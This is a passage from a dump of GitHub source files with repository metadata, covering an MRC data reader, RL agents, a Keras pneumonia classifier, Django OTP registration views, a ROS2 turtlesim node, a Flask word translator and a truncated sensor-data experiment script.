{}\n tokens = [\"[CLS]\"] + query_tokens + [\"[SEP]\"]\n segment_ids = [0] * len(tokens)\n\n doc_start = doc_span.start\n doc_offset = len(query_tokens) + 2\n sentence_list = sentence_spans_list[doc_span_index]\n cur_sentence_list = []\n for sen_id, sen in enumerate(sentence_list):\n new_sen = (sen[0] - doc_start + doc_offset, sen[1] - doc_start + doc_offset)\n cur_sentence_list.append(new_sen)\n\n for i in range(doc_span.length):\n split_token_index = doc_span.start + i\n token_to_orig_map[len(tokens)] = tok_to_orig_index[split_token_index]\n is_max_context = utils.check_is_max_context(doc_spans, doc_span_index, split_token_index)\n\n token_is_max_context[len(tokens)] = is_max_context\n tokens.append(all_doc_tokens[split_token_index])\n segment_ids.append(1)\n tokens.append(\"[SEP]\")\n segment_ids.append(1)\n\n input_ids = tokenizer.convert_tokens_to_ids(tokens)\n input_mask = [1] * len(input_ids)\n\n while len(input_ids) < max_seq_length:\n input_ids.append(0)\n input_mask.append(0)\n segment_ids.append(0)\n\n assert len(input_ids) == len(input_mask) == len(segment_ids) == max_seq_length\n\n doc_start = doc_span.start\n doc_end = doc_span.start + doc_span.length - 1\n\n \"\"\"\n There are multiple evidence sentences in some examples. To avoid multi-label setting,\n we choose to use the evidence sentence with the max length.\n \"\"\"\n span_sen_id = -1\n max_evidence_length = 0\n for piece_sen_id, sen_id in enumerate(sentence_ids_list[doc_span_index]):\n if sen_id in ini_sen_id:\n evidence_length = cur_sentence_list[piece_sen_id][1] - cur_sentence_list[piece_sen_id][0]\n if evidence_length > max_evidence_length:\n max_evidence_length = evidence_length\n span_sen_id = piece_sen_id\n meta_data = {\n 'span_sen_to_orig_sen_map': sentence_ids_list[doc_span_index]\n }\n\n if span_sen_id == -1:\n answer_choice = 0\n else:\n answer_choice = example.is_impossible + 1\n\n features.append(QAFullInputFeatures(\n qas_id=example.qas_id,\n unique_id=unique_id,\n example_index=example_index,\n doc_span_index=doc_span_index,\n sentence_span_list=cur_sentence_list,\n tokens=tokens,\n token_to_orig_map=token_to_orig_map,\n token_is_max_context=token_is_max_context,\n input_ids=input_ids,\n input_mask=input_mask,\n segment_ids=segment_ids,\n is_impossible=answer_choice,\n sentence_id=span_sen_id,\n start_position=None,\n end_position=None,\n ral_start_position=None,\n ral_end_position=None,\n meta_data=meta_data\n ))\n unique_id += 1\n return features\n\n def write_predictions(self, all_examples, all_features, all_results: List[FullResult], output_prediction_file: str = None,\n null_score_diff_threshold: float = 0.0):\n self.yesno_cate.reset()\n logger.info(\"Writing predictions to: %s\" % output_prediction_file)\n\n example_index_to_features = collections.defaultdict(list)\n for feature in all_features:\n example_index_to_features[feature.example_index].append(feature)\n\n unique_id_to_result = {}\n for result in all_results:\n unique_id_to_result[result.unique_id] = result\n\n all_predictions = collections.OrderedDict()\n\n for (example_index, example) in enumerate(all_examples):\n features = example_index_to_features[example_index]\n\n max_diff = -1000000\n max_diff_yes_logit = 0\n max_diff_no_logit = 0\n for (feature_index, feature) in enumerate(features):\n result = unique_id_to_result[feature.unique_id]\n choice_logits = result.choice_logits\n non_null_logit = choice_logits[1] + choice_logits[2]\n yes_logit = choice_logits[1]\n no_logit = choice_logits[2]\n null_logit = choice_logits[0]\n diff = non_null_logit - null_logit\n if diff > max_diff:\n max_diff = diff\n max_diff_yes_logit = yes_logit\n max_diff_no_logit = no_logit\n\n if max_diff_yes_logit > max_diff_no_logit:\n final_text = 'yes'\n scores = max_diff_yes_logit\n else:\n final_text = 'no'\n scores = max_diff_no_logit\n all_predictions[example.qas_id] = {\n 'answer': final_text,\n 'scores': scores\n }\n\n gold_label = 'yes' if example.is_impossible == 0 else 'no'\n self.yesno_cate.update(gold_label, final_text)\n\n logger.info('Yes/No Metric: %s' % self.yesno_cate)\n\n if output_prediction_file is not None:\n with open(output_prediction_file, 'w') as f:\n json.dump(all_predictions, f, indent=2)\n return all_predictions\n\n @staticmethod\n def data_to_tensors(all_features: List[QAFullInputFeatures]):\n all_input_ids = torch.LongTensor([f.input_ids for f in all_features])\n all_segment_ids = torch.LongTensor([f.segment_ids for f in all_features])\n all_input_mask = torch.LongTensor([f.input_mask for f in all_features])\n all_answer_choice = torch.LongTensor([f.is_impossible for f in all_features])\n all_sentence_ids = torch.LongTensor([f.sentence_id for f in all_features])\n all_feature_index = torch.arange(all_input_ids.size(0), dtype=torch.long)\n\n return all_input_ids, all_segment_ids, all_input_mask, all_answer_choice, all_sentence_ids, all_feature_index\n\n @staticmethod\n def generate_inputs(batch: Tuple, all_features: List[QAFullInputFeatures], model_state, do_label=False):\n assert model_state in ModelState\n feature_index = batch[5].tolist()\n sentence_span_list = [all_features[idx].sentence_span_list for idx in feature_index]\n inputs = {\n 'input_ids': batch[0],\n 'token_type_ids': batch[1],\n 'attention_mask': batch[2],\n 'sentence_span_list': sentence_span_list\n }\n if model_state == ModelState.Test:\n return inputs\n if model_state == ModelState.Train or model_state == ModelState.Evaluate:\n inputs['answer_choice'] = batch[3]\n inputs['sentence_ids'] = batch[4]\n\n return inputs\n","repo_name":"SparkJiao/Self-Training-MRC","sub_path":"reader/fever_reader.py","file_name":"fever_reader.py","file_ext":"py","file_size_in_byte":13327,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"37"} +{"seq_id":"28750099425","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[2]:\n\n\n리스트 = [\"가\", \"나\", \"다\", \"라\"]\nfor i in 리스트[: :-1]:\n print(i)\n#리스트를 [::-1] 인덱스를 사용해 역순으로 값을 슬라이싱한다.\n#for i in 리스트 : 리스트의 원소들을 i에 넣으라는 뜻. print(i)를 실행하면 순서대로 출력된다.\n\n","repo_name":"baesoyeon/MSE_Python","sub_path":"ex150.py","file_name":"ex150.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72192192107","text":"import numpy as np\nimport random\n\nfrom utils import draw_episode_steps\nfrom utils import draw_grid\n\n\nclass TDAgent(object):\n\n def __init__(self, env, epsilon, gamma, alpha=0.1):\n self.env = env\n self.gamma = gamma\n self.alpha = alpha\n self.epsilon = epsilon # explore & exploit\n self.init_epsilon = epsilon\n\n self.P = np.zeros((self.env.num_s, self.env.num_a))\n\n self.V = np.zeros(self.env.num_s)\n self.Q = np.zeros((self.env.num_s, self.env.num_a))\n\n self.step_set = [] # store steps of each episode\n self.avg_step_set = [] # store average steps of each 100 episodes\n self.episode = 1\n self.step = 0\n self.max_episodes = 5000\n\n # initialize random policy\n for s in range(self.env.num_s):\n poss = self.env.allow_actions(s)\n for a in poss:\n self.P[s][a] = 1.0 / len(poss)\n\n self.curr_s = None\n self.curr_a = None\n\n def predict(self, episode=1000):\n for e in range(episode):\n curr_s = self.env.reset() # new episode\n while not self.env.is_terminal(curr_s): # for every time step\n a = self.select_action(curr_s, policy='greedy')\n r = self.env.rewards(curr_s, a)\n next_s = self.env.next_state(curr_s, a)\n self.V[curr_s] += self.alpha \\\n * (r+self.gamma*self.V[next_s] - self.V[curr_s])\n curr_s = next_s\n # result display\n draw_grid(self.env, self, p=True, v=True, r=True)\n\n def control(self, method):\n assert method in (\"qlearn\", \"sarsa\")\n\n if method == \"qlearn\":\n agent = Qlearn(self.env, self.epsilon, self.gamma)\n else:\n agent = SARSA(self.env, self.epsilon, self.gamma)\n\n while agent.episode < self.max_episodes:\n agent.learn(agent.act())\n\n # result display\n draw_grid(self.env, agent, p=True, v=True, r=True)\n # draw episode steps\n draw_episode_steps(agent.avg_step_set)\n\n def update_policy(self):\n # update according to Q value\n poss = self.env.allow_actions(self.curr_s)\n # Q values of all allowed actions\n qs = self.Q[self.curr_s][poss]\n q_maxs = [q for q in qs if q == max(qs)]\n # update probabilities\n for i, a in enumerate(poss):\n self.P[self.curr_s][a] = \\\n 1.0 / len(q_maxs) if qs[i] in q_maxs else 0.0\n\n def select_action(self, state, policy='egreedy'):\n poss = self.env.allow_actions(state) # possible actions\n if policy == 'egreedy' and random.random() < self.epsilon:\n a = random.choice(poss)\n else: # greedy action\n pros = self.P[state][poss] # probabilities for possible actions\n best_a_idx = [i for i, p in enumerate(pros) if p == max(pros)]\n a = poss[random.choice(best_a_idx)]\n return a\n\n\nclass SARSA(TDAgent):\n\n def __init__(self, env, epsilon, gamma):\n super(SARSA, self).__init__(env, epsilon, gamma)\n self.reset_episode()\n\n def act(self):\n s = self.env.next_state(self.curr_s, self.curr_a)\n a = self.select_action(s, policy='egreedy')\n r = self.env.rewards(self.curr_s, self.curr_a)\n r -= 0.01 # a bit negative reward for every step\n return [self.curr_s, self.curr_a, r, s, a]\n\n def learn(self, exp):\n s, a, r, n_s, n_a = exp\n\n if self.env.is_terminal(s):\n target = r\n else:\n target = r + self.gamma * self.Q[n_s][n_a]\n self.Q[s][a] += self.alpha * (target - self.Q[s][a])\n\n # update policy\n self.update_policy()\n\n if self.env.is_terminal(s):\n self.V = np.sum(self.Q, axis=1)\n print('episode %d step: %d epsilon: %f' %\n (self.episode, self.step, self.epsilon))\n self.reset_episode()\n self.epsilon -= self.init_epsilon / 10000\n # record per 100 episode\n if self.episode % 100 == 0:\n self.avg_step_set.append(\n np.sum(self.step_set[self.episode-100: self.episode])/100)\n else: # shift state-action pair\n self.curr_s = n_s\n self.curr_a = n_a\n self.step += 1\n\n def reset_episode(self):\n # start a new episode\n self.curr_s = self.env.reset()\n self.curr_a = self.select_action(self.curr_s, policy='egreedy')\n self.episode += 1\n self.step_set.append(self.step)\n self.step = 0\n\n\nclass Qlearn(TDAgent):\n\n def __init__(self, env, epsilon, gamma):\n super(Qlearn, self).__init__(env, epsilon, gamma)\n self.reset_episode()\n\n def act(self):\n a = self.select_action(self.curr_s, policy='egreedy')\n s = self.env.next_state(self.curr_s, a)\n r = self.env.rewards(self.curr_s, a)\n r -= 0.01\n return [self.curr_s, a, r, s]\n\n def learn(self, exp):\n s, a, r, n_s = exp\n\n # Q-learning magic\n if self.env.is_terminal(s):\n target = r\n else:\n target = r + self.gamma * max(self.Q[n_s])\n self.Q[s][a] += self.alpha * (target - self.Q[s][a])\n\n self.update_policy()\n # shift to next state\n if self.env.is_terminal(s):\n self.V = np.sum(self.Q, axis=1)\n print('episode %d step: %d' % (self.episode, self.step))\n self.reset_episode()\n self.epsilon -= self.init_epsilon / self.max_episodes\n # record per 100 episode\n if self.episode % 100 == 0:\n self.avg_step_set.append(\n np.sum(self.step_set[self.episode-100: self.episode])/100)\n else:\n self.curr_s = n_s\n self.step += 1\n\n def reset_episode(self):\n self.curr_s = self.env.reset()\n self.episode += 1\n self.step_set.append(self.step)\n self.step = 0\n","repo_name":"borgwang/reinforce_py","sub_path":"algorithms/TD/agents.py","file_name":"agents.py","file_ext":"py","file_size_in_byte":5970,"program_lang":"python","lang":"en","doc_type":"code","stars":108,"dataset":"github-code","pt":"37"} +{"seq_id":"10840544861","text":"import matplotlib.pyplot as plt\nfrom keras.models import Sequential\nfrom keras.layers import Convolution2D, MaxPooling2D, Flatten, Dense, Dropout\nfrom keras.preprocessing.image import ImageDataGenerator\n\nimage_width, image_height = 150, 150\n\ndef create_model(p, input_shape=(64, 64, 1)):\n model = Sequential()\n\n model.add(Convolution2D(32, (3,3), input_shape=input_shape, activation='relu'))\n model.add(MaxPooling2D(pool_size=(2,2)))\n model.add(Convolution2D(32, (3,3), activation='relu'))\n model.add(MaxPooling2D(pool_size=(2,2)))\n model.add(Convolution2D(64, (3,3), activation='relu'))\n model.add(MaxPooling2D(pool_size=(2,2)))\n model.add(Convolution2D(64, (3,3), activation='relu'))\n model.add(MaxPooling2D(pool_size=(2,2)))\n\n\n model.add(Flatten())\n\n model.add(Dense(units=64, activation='relu'))\n model.add(Dropout(p))\n model.add(Dense(units=64, activation='relu'))\n model.add(Dense(units=64, activation='relu'))\n model.add(Dropout(p/2))\n model.add(Dense(units=1, activation='sigmoid'))\n\n model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])\n\n return model\n\ndef train(batch_size=32, epochs=10):\n train_datagen = ImageDataGenerator(rescale=1./255, shear_range=0.2, zoom_range=0.2, horizontal_flip=True)\n\n test_datagen = ImageDataGenerator(rescale=1./255)\n\n training_set = train_datagen.flow_from_directory('chest_xray/train', target_size=(image_width, image_height), batch_size=batch_size, class_mode='binary')\n\n test_set = test_datagen.flow_from_directory('chest_xray/test', target_size=(image_width, image_height), batch_size=batch_size, class_mode='binary')\n\n model = create_model(p=0.5, input_shape=(image_width, image_height, 3))\n training_history = model.fit_generator(training_set, steps_per_epoch=(training_set.n/training_set.batch_size), epochs=epochs, validation_data=test_set, validation_steps=(test_set.n/test_set.batch_size))\n\n model.save(\"pneumonia.h5\")\n model.save_weights(\"pneumonia_weight.h5\")\n print(\"Saved model on disk\")\n\n plot_training_history(training_history, 'acc', 'val_acc')\n\ndef plot_training_history(training_history, train_acc, test_acc):\n plt.plot(training_history.history[train_acc])\n plt.plot(training_history.history[test_acc])\n plt.title('Training History')\n plt.ylabel('Accuracy')\n plt.xlabel('Epoch')\n plt.legend(['Train', 'Test'], loc='upper left')\n plt.savefig('pneumonia_training.png')\n plt.show()\n\ndef main():\n train(batch_size=32, epochs=50)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"puritatemcordis/Pneumonia-CNN","sub_path":"train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":2565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24096450608","text":"from django.shortcuts import render\n\n# Create your views here.\nfrom rest_framework import status\nfrom rest_framework import serializers\nfrom rest_framework import response\nfrom rest_framework.serializers import Serializer\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework.permissions import AllowAny, IsAuthenticated\nfrom rest_framework.permissions import IsAuthenticated\nfrom django.core.mail import EmailMultiAlternatives\nimport random\n# from rest_framework.decorators import list_route\n\nfrom .serializers import (\n UserRegistrationSerializer,\n UserLoginSerializer,\n verification_otpSerializer,\n # ChangePasswordSerializer\n # UserListSerializer\n)\n# from utils import res_codes\nimport jwt\nfrom .models import User\n\n# otp_send = random.randint(100000,999999)\nval_otp = None\n\nclass UserRegistrationView(APIView):\n serializer_class = UserRegistrationSerializer\n permission_classes = (AllowAny, )\n\n def post(self, request):\n otp_send = random.randint(100000, 999999)\n global val_otp\n def val_otp():\n return otp_send\n serializer = self.serializer_class(data=request.data)\n valid = serializer.is_valid(raise_exception=True)\n if valid:\n serializer.save()\n print(\"<<<<<<<<<<<<<<\",otp_send)\n # if otp_send is is_verified: \n email = EmailMultiAlternatives('Confirmation mail.', f'verification otp is {otp_send}', 'sahilpuniawins@gmail.com', [\n serializer.data['email']])\n email.send()\n status_code = status.HTTP_201_CREATED\n \n\n response = {\n 'success': True,\n 'statusCode': status_code,\n 'message': 'User successfully registered!',\n 'user': serializer.data\n }\n\n return Response(response, status=status_code)\n\nclass verification_otpAPIView(APIView):\n def post(self ,request):\n ok = val_otp()\n serializer = verification_otpSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n if serializer.data['otp'] == ok:\n print(\"<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>not macthed\")\n # status_code = status.HTTP_400_BAD_REQUEST\n # response = {\n # 'success': False,\n # 'message': 'email otp is not matched',\n # 'user': serializer.data\n # }\n return Response(serializer.data,status=status.HTTP_400_BAD_REQUEST)\n\n\ndef tiv():\n\n pf = User.objects.filter()\n for item in pf:\n item.is_active = True\n item.save() \n\n\n\n\nclass UserLoginView(APIView):\n serializer_class = UserLoginSerializer\n permission_classes = (AllowAny, )\n\n def post(self, request):\n serializer = self.serializer_class(data=request.data)\n valid = serializer.is_valid(raise_exception=True)\n\n if valid:\n status_code = status.HTTP_200_OK\n\n response = {\n 'success': True,\n 'statusCode': status_code,\n 'message': 'User logged in successfully',\n 'access': serializer.data['access'],\n 'refresh': serializer.data['refresh'],\n 'authenticatedUser': {\n 'email': serializer.data['email'],\n # 'role': serializer.data['role']\n }\n }\n\n return Response(response, status=status_code)\n\n\n# class idView(APIView):\n# serializer_class = UserLoginSerializer\n# permission_classes = (AllowAny, )\n\n# def post(self, request):\n# serializer = self.serializer_class(data=request.data)\n# valid = serializer.is_valid(raise_exception=True)\n# decode = jwt.decode(serializer.data['access'], options={\n# \"verify_signature\": False})\n# print(\">>>>>>>>>>>>>>>>>\", decode)\n# id = decode.get(\"user_id\")\n\n# if valid:\n# status_code = status.HTTP_200_OK\n\n# response = {\n# 'id':id,\n# }\n \n\n# return Response(response, status=status_code)\n\n\n","repo_name":"SahilpuniaDits/Django","sub_path":"otp/registerotp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10329608951","text":"# -*- coding: utf-8 -*-\n\n#これは、Turtlesimのカメを動かすPyhonプログラムです。\n\n\n#ライブラリのインポート\nimport rclpy\nfrom rclpy.node import Node\nfrom geometry_msgs.msg import Twist\nfrom turtlesim.msg import Pose\n\n\nclass MoveTurtle(Node):\n\tdef __init__(self):\n #turtlesim_moveという名のノードを作成します\n\t\tsuper().__init__('turtlesim_move')\n #Twist型のメッセージを配信する/turtle1/cmd_velというトピックを作成します\n\t\tself.pub = self.create_publisher(Twist, '/turtle1/cmd_vel', 10)\n #定期的に呼ばれるコールバック関数の定義\n\t\tself.tmr = self.create_timer(1.0,self.timer_callback)\n #/turtle1/pooseからメッセージを購読する準備\n\t\tself.sub = self.create_subscription(Pose, '/turtle1/pose', self.pose_callback, 10)\n\n #メッセージが更新された時のコールバック関数\n\tdef pose_callback(self, msg):\n #位置と姿勢を画面に表示\n\t\tself.get_logger().info('(x,y,theta):[%f%f%f]'%(msg.x,msg.y,msg.theta))\n \n #定期的に呼ばれるコールバック関数\n\tdef timer_callback(self):\n\t\tmsg = Twist()\n #並進速度のx成分\n\t\tmsg.linear.x = 1.0\n #回転速度のz成分\n\t\tmsg.angular.z = 0.5\n #メッセージを配信\n\t\tself.pub.publish(msg)\n\ndef main(args=None):\n\trclpy.init(args=args)\n\tmove=MoveTurtle()\n\trclpy.spin(move)\n\n\nif __name__ == '__main__':\n\tmain()","repo_name":"OhataKazuki/my-program","sub_path":"ROS2/moveTurtle.py","file_name":"moveTurtle.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41438087050","text":"from flask import * \nimport sqlite3\nfrom flask_socketio import SocketIO, emit, join_room, leave_room\n\n\n\n\n\nconn = sqlite3.connect(\"words.db\")\nc = conn.cursor()\n\napp = Flask(__name__)\nsocketio = SocketIO(app)\n\n\n@socketio.on(\"receiver\")\ndef handle(text):\n print(text)\n temptext = text[\"msg\"].split()\n translatedwords = []\n \n for i in temptext:\n conn = sqlite3.connect(\"words.db\")\n c = conn.cursor()\n search = \"SELECT * FROM chavacanowords WHERE filipinoword = ? OR filipinoword = ? OR filipinoword LIKE ? OR filipinoword LIKE ?\"\n search = \"\"\"SELECT chavacanoword\nFROM (\n SELECT *, 1 AS exactmatch\n FROM chavacanowords \n WHERE filipinoword = ? OR filipinoword = ?\n UNION ALL\n SELECT *, 0 AS exactmatch\n FROM chavacanowords \n WHERE filipinoword LIKE ? OR filipinoword LIKE ?\n) m\nORDER BY exactmatch DESC\nLIMIT 1\"\"\"\n \n c.execute(search, (i, i.title(), '%'+i+'%', '%'+i.title()+'%'))\n result = c.fetchone()\n if result:\n translatedwords.append(result[0])\n else:\n translatedwords.append(i)\n \n print(temptext)\n result = ' '.join(translatedwords)\n print(result)\n emit('translate', result.lower())\n\n\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\")\n\n\n@app.route(\"/translate\")\ndef translate():\n return render_template(\"translate.html\")\n\nif __name__ == \"__main__\":\n socketio.run(app, debug = True)","repo_name":"DefinitelyNotAnAssassin/Chavacano_Website","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33792356478","text":"# Map of class name to Font-Awesome icon\nfrom typing import Dict, Tuple, Union\n\nclass_map: Dict[str, str] = {}\n\n_class_map = {\n (\"chrome\",\n \"google-chrome\",\n \"google-chrome-stable\",\n \"google-chrome-unstable\",\n \"chromium\"):\n \"\\uf268\",\n\n \"firefox\": \"\\uf269\",\n\n (\"epiphany\", \"minibrowser\"): \"\\uf267\",\n\n # yeah, I use all of those\n # Check the classes with xprop |grep WM_CLASS\n (\"jetbrains-pychar\",\n \"jetbrains-pycharm-ce\",\n \"jetbrains-webstorm\",\n \"jetbrains-idea\",\n \"jetbrains-idea-c\",\n \"jetbrains-idea-ce\",\n \"jetbrains-clion\",\n \"jetbrains-studi\",\n \"jetbrains-phpstorm\",\n \"jetbrains-studio\", # Android Studio\n \"emacs\",\n \"code\",\n \"qtcreator\"):\n \"\\uf121\",\n\n \"gvim\": \"\\uf27d\",\n \"teamspeak 3\": \"\\uf0c0\",\n \"steam\": \"\\uf1b6\",\n \"\": \"\\uf1bc\", # spotify... but also some other misbehaving apps that don't\n # set class name or set it too late for bspwm to notice\n (\"dolphin\", \"dolphin4\"): \"\\uf07c\",\n \"thunderbird\": \"\\uf003\",\n \"skype\": \"\\uf17e\",\n (\"gajim\", \"revolt\"): \"\\uf075\",\n \"clementine\": \"\\uf001\",\n (\"gnome-terminal\",\n \"konsole\",\n \"xterm\",\n \"termite\",\n \"terminology\",\n \"urxvt\"):\n \"\\uf120\",\n \"okular\": \"\\uf02d\",\n (\"gimp\",\n \"krita\",\n \"mypaint\"): \"\\uf1fc\",\n \"inkscape\": \"\\uf040\",\n}\n\ndef _expand_to_list(item):\n if isinstance(item, tuple):\n return item\n else:\n return (item, )\n\nfor keys, value in _class_map.items():\n for key in _expand_to_list(keys):\n assert key == \"\" or key.islower()\n class_map[key] = value","repo_name":"ntrrgc/dotfiles","sub_path":"wtfd/wm_class_icons.py","file_name":"wm_class_icons.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"72697631787","text":"import itertools\nimport pickle as pickle\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom tqdm import tqdm\nfrom baetorch.baetorch.evaluation import (\n calc_auroc,\n concat_ood_score,\n evaluate_random_retained_unc,\n evaluate_misclas_detection,\n convert_hard_pred,\n summarise_retained_perf,\n evaluate_retained_unc_v2,\n)\nfrom baetorch.baetorch.lr_range_finder import run_auto_lr_range_v4\nfrom baetorch.baetorch.models_v2.bae_ensemble import BAE_Ensemble\nfrom baetorch.baetorch.models_v2.bae_mcdropout import BAE_MCDropout\nfrom baetorch.baetorch.models_v2.bae_sghmc import BAE_SGHMC\nfrom baetorch.baetorch.models_v2.bae_vi import BAE_VI\nfrom baetorch.baetorch.models_v2.base_layer import flatten_np\nfrom baetorch.baetorch.models_v2.outlier_proba import BAE_Outlier_Proba\nfrom baetorch.baetorch.models_v2.vae import VAE\nfrom baetorch.baetorch.util.convert_dataloader import convert_dataloader\nfrom baetorch.baetorch.util.misc import time_method\nfrom baetorch.baetorch.util.seed import bae_set_seed\nfrom strathclyde_analysis_v2.evaluate_outlier_uncertainty import evaluate_ood_unc\nfrom uncertainty_ood.exceed import calc_exceed\nfrom uncertainty_ood_v2.util.get_predictions import flatten_nll, calc_e_nll\nfrom uncertainty_ood_v2.util.sensor_preproc import (\n MinMaxSensor,\n FFT_Sensor,\n Resample_Sensor,\n)\nfrom uncertainty_ood_v2.util.sensor_preproc import (\n Resample_Sensor_Fourier,\n)\nfrom util.evaluate_ood import evaluate_bce_se\nfrom util.exp_manager import ExperimentManager\nimport os\n\nbae_set_seed(100)\n\n# args for script\ntotal_sensors = 17\npath_data = \"pickles/raw_data.p\"\npickle_path = \"pickles/\"\ndata_raw = pickle.load(open(pickle_path + \"raw_data.p\", \"rb\"))\nnum_cycles = 2205\nsensor_xis = 1\nseq_xis = 2\n\n# exp name and filenames\nexp_name = \"ZEMA_HYD_SS10\"\nauroc_filename = exp_name + \"AUROC.csv\"\nbce_se_filename = exp_name + \"BCE_VS_SE.csv\"\nretained_perf_filename = exp_name + \"retained_perf.csv\"\nmisclas_perf_filename = exp_name + \"misclas_perf.csv\"\nsensor_auroc_filename = exp_name + \"sensors_auroc.csv\"\nood_level_auroc_filename = exp_name + \"level_auroc.csv\"\n\napply_fft = False\n\n# whether to evaluate OOD uncertainty\neval_ood_unc = False\nif eval_ood_unc:\n pickle_files = [\n auroc_filename,\n bce_se_filename,\n retained_perf_filename,\n misclas_perf_filename,\n sensor_auroc_filename,\n ]\nelse:\n pickle_files = [auroc_filename, bce_se_filename, sensor_auroc_filename]\n\n# Loop over all grid search combinations\n# fmt: off\nn_random_seeds = 1\nrandom_seeds = np.random.randint(0, 1000, n_random_seeds)\nfull_likelihood = [\"mse\", \"homo-gauss\", \"hetero-gauss\", \"homo-tgauss\", \"hetero-tgauss\", \"bernoulli\", \"cbernoulli\",\n \"beta\"]\nhomoscedestic_mode_map = {\"bernoulli\": \"none\", \"cbernoulli\": \"none\", \"homo-gauss\": \"every\", \"hetero-gauss\": \"none\",\n \"homo-tgauss\": \"none\", \"hetero-tgauss\": \"none\", \"mse\": \"none\", \"beta\": \"none\"}\nlikelihood_map = {\"bernoulli\": \"bernoulli\", \"cbernoulli\": \"cbernoulli\", \"homo-gauss\": \"gaussian\",\n \"hetero-gauss\": \"gaussian\", \"homo-tgauss\": \"truncated_gaussian\",\n \"hetero-tgauss\": \"truncated_gaussian\", \"mse\": \"gaussian\", \"beta\": \"beta\"}\ntwin_output_map = {\"bernoulli\": False, \"cbernoulli\": False, \"homo-gauss\": False, \"hetero-gauss\": True,\n \"homo-tgauss\": False, \"hetero-tgauss\": True, \"mse\": False, \"beta\": True}\n# fmt: on\n\nbae_type_classes = {\n \"ens\": BAE_Ensemble,\n \"mcd\": BAE_MCDropout,\n \"sghmc\": BAE_SGHMC,\n \"vi\": BAE_VI,\n \"vae\": VAE,\n \"ae\": BAE_Ensemble,\n}\n\nn_bae_samples_map = {\n \"ens\": 5,\n \"mcd\": 100,\n \"sghmc\": 100,\n \"vi\": 100,\n \"vae\": 100,\n \"ae\": 1,\n}\n\n# grid = {\n# \"random_seed\": random_seeds,\n# \"apply_fft\": [apply_fft],\n# # \"ss_id\": [\n# # *np.arange(total_sensors).astype(int),\n# # list(np.arange(total_sensors).astype(int)),\n# # ],\n# \"ss_id\": [0],\n# \"target_dim\": [0, 1, 2, 3],\n# \"resample_factor\": [60],\n# \"skip\": [False, True],\n# \"latent_factor\": [0.5],\n# \"bae_type\": [\"ae\", \"ens\"],\n# \"full_likelihood\": [\"mse\"],\n# }\n\n# grid = {\n# \"random_seed\": [1],\n# \"apply_fft\": [apply_fft],\n# # \"ss_id\": [\n# # *np.arange(total_sensors).astype(int),\n# # list(np.arange(total_sensors).astype(int)),\n# # ],\n# \"ss_id\": list(range(17)) + [list(range(17))],\n# \"target_dim\": [0],\n# \"resample_factor\": [60],\n# \"skip\": [False],\n# \"latent_factor\": [0.5],\n# \"bae_type\": [\"ae\"],\n# \"full_likelihood\": [\"mse\"],\n# }\n\n# grid = {\n# \"random_seed\": random_seeds,\n# \"apply_fft\": [apply_fft],\n# \"ss_id\": [-1],\n# \"target_dim\": [0],\n# \"resample_factor\": [562],\n# \"skip\": [True],\n# \"latent_factor\": [0.5],\n# \"bae_type\": [\"ae\"],\n# \"full_likelihood\": [\"mse\"],\n# }\n\n# GRID SELECT SENSORS\ngrid = {\n \"random_seed\": random_seeds,\n \"apply_fft\": [apply_fft],\n \"ss_id\": [12],\n \"target_dim\": [0],\n \"resample_factor\": [60],\n \"skip\": [False],\n \"latent_factor\": [0.5],\n \"bae_type\": [\"ens\"],\n # \"full_likelihood\": [\"mse\"],\n \"full_likelihood\": [\"hetero-gauss\"],\n # \"full_likelihood\": [\"homo-gauss\"],\n}\ntarget_dim_ssid = [12, 12, 5, 12]\n\nfor values in tqdm(itertools.product(*grid.values())):\n # setup the grid\n exp_params = dict(zip(grid.keys(), values))\n print(exp_params)\n\n # unpack exp params\n random_seed = exp_params[\"random_seed\"]\n apply_fft = exp_params[\"apply_fft\"]\n sensor_i = exp_params[\"ss_id\"]\n target_dim = exp_params[\"target_dim\"]\n resample_factor = exp_params[\"resample_factor\"]\n skip = exp_params[\"skip\"]\n latent_factor = exp_params[\"latent_factor\"]\n bae_type = exp_params[\"bae_type\"]\n full_likelihood_i = exp_params[\"full_likelihood\"]\n twin_output = twin_output_map[full_likelihood_i]\n homoscedestic_mode = homoscedestic_mode_map[full_likelihood_i]\n likelihood = likelihood_map[full_likelihood_i]\n n_bae_samples = n_bae_samples_map[bae_type]\n\n # conditional ss_id (-1) on target_dim\n if sensor_i == -1:\n sensor_i = target_dim_ssid[target_dim]\n exp_params.update({\"ss_id\": sensor_i})\n\n # Apply Resample here\n # use encode/load pickle of the resampled x data\n if not os.path.exists(os.path.join(\"x_resampled\", \"pickles\")):\n os.mkdir(os.path.join(\"x_resampled\", \"pickles\"))\n\n resample_maps = {\n \"Hz_1\": {\"n\": 1, \"mode\": \"up\"},\n \"Hz_10\": {\"n\": 10, \"mode\": \"down\"},\n \"Hz_100\": {\"n\": 100, \"mode\": \"down\"},\n }\n\n exp_man = ExperimentManager(folder_name=\"x_resampled\")\n pickle_x_rs = exp_man.encode({\"resample\": resample_factor})\n if pickle_x_rs not in os.listdir(os.path.join(\"x_resampled\", \"pickles\")):\n x_resampled = None\n for id_, key in enumerate([\"Hz_1\", \"Hz_10\", 